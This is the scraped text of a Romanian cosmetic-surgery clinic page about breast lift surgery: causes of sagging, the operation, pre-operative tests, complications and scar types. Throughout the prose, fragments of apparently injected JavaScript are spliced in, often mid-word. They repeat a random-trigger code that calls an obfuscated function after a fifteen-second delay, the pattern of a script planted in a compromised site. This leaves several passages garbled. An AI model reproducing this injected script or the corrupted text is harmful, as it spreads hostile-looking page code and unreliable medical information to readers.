surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Sani cazuti

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Sanii cazuti reprezinta izvorul multor frustrari si nemultumiri in random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andul femeilor.  O femeie care are sanii lasati nu este multumita de aspectul decolte-ului sau si in consecinta cauta  mereu remediu impotriva acestei probleme, insa ce trebuie stiut de toate femeile, este ca nici un exercitiu fizic nu poate ajuta sanii ptozati.

Cauzele ptozei mamare (caderii sanului) pot fi variate: predispozitia constitutionala, sarcina si alaptarea, scaderile masive in greutate, inaintarea in varsta, etc. Nimeni nu poate impiedica efectul gravitatiei si a trecerii timpului insa putem interveni favorabil cu ajutorul chirurgiei estetice pentru a imbunatati aspectul sanilor cazuti.
Pozitia si forma sanului pot fi remodelate de catre chirurgul estetician prin lifting-ul sanilor.

In general, lifting-ul de sani consta in:
-inlaturarea surplusului de piele,
– repozitionarea  mamelonului in pozitia normala,
– ridicarea si remodelarea glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andei mamare pentru obtinerea unui efect durabil si a unui  aspect estetic placut.

Actul terapeutic
Incepe din momentul consultatiei candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and se formeaza echipa medic pacient si se contureaza asteptarile pacientei si posibilitatile medicale de la caz la caz.
Inainte de operatie veti primi un set de analize si investigatii standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andard ce trebuie facute pentru a monitoriza starea dumneavoastra de sanatate. In plus se va efectua o ecografie mamara si/sau mamografie atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and este cazul. Operatia este planificata doar in cazul in care toate rezultatele sunt in limite normale si pacienta este sanatoasa.

Operatia se face sub anestezie generala, modificarea aspectului sanilor este imediat dar forma si volumul final se vor definitiva dupa cateva luni. In unele cazuri exista tuburi de dren pentru cateva zile, ceea ce poate fi o sursa minora de discomfort fizic. Este obligatorie purtarea unei bustiere in primele luni dupa operatie pentru a obtine un aspect optim al sanilor.

Posibile complicatii:
Complicatiile posibile imediate sunt cele comune oricarei interventii chirurgicale: hematom, serom,  scaderea temporara a sensibilitatii mamelonului insa  pentru fiecare exista manevre si tratamente locale care vor rezolva disconfortul.
Complicatiile tardive (la distanta de timp) sunt cicatricile inestetice sau mici asimetrii. Unele pot necesita revizii ulterioare.

Cicatricile postoperatorii
Cicatricile postoperatorii sunt diferite in functie de gradul de ptoza (cadere a sanului) si implicit, de procedeul folosit de chirurg.
Ele pot varia de la o cicatrice rotunda in jurul mamelonului pentru ptoze minore, la cicatrice rotunda plus verticala in cazurile medii, pana la cicatrice rotunda plus verticala plus cicatrice inferioara in pliul de sub san.

Cicatricea periareolara (in jurul areolei) se plaseaza exact la limita dintre mamelon si pielea normala, ea fiind camuflata cu usurinta.
Cicatricea inferioara este proiectata in pliul de sub san, ea fiind de asemenea usor de ascuns.
Cicatricea verticala este cea mai vizibila si cu predispoziatia cea mai mare de a avea un aspect inestetic comparativ cu celelalte doua.

mamoreductie1

Un rol important in aspectul final al cicatricilor il au mai multi factori: tehnica si experienta chirurgului, calitatea firului de sutura, conduita sau gradul de cooperare al pacientei dupa operatiei, dar si organismul pacientei. Este cunoscut faptul ca o persoana care are cicatrici cheloide in alte zone va avea risc crescut de a dezvolta astfel de cicatrici si dupa operatia la sani.

Important de stiut este ca ridicarea sanilor nu modifica volumul sanului, ci doar forma tridimensionala si armonioasa a acestuia. Daca se doreste marirea cupei atunci se va apela la implante( vezi implant cu lifting).

Dupa interventia de lifting a sanilor cazuti, se obtine un san tonic, cu aspect proaspat si revitalizat.

Suna Acum!
Navigheaza!